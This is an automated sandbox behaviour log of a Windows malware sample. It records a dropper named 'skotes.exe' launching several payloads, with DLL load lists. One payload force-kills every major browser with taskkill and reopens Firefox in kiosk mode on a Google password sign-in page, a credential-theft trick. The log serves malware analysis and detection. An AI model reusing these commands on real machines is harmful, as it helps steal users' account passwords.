Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe"
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe"
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: windows.shell.servicehostbuilder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe Section loaded: mswsock.dll Jump to behavior
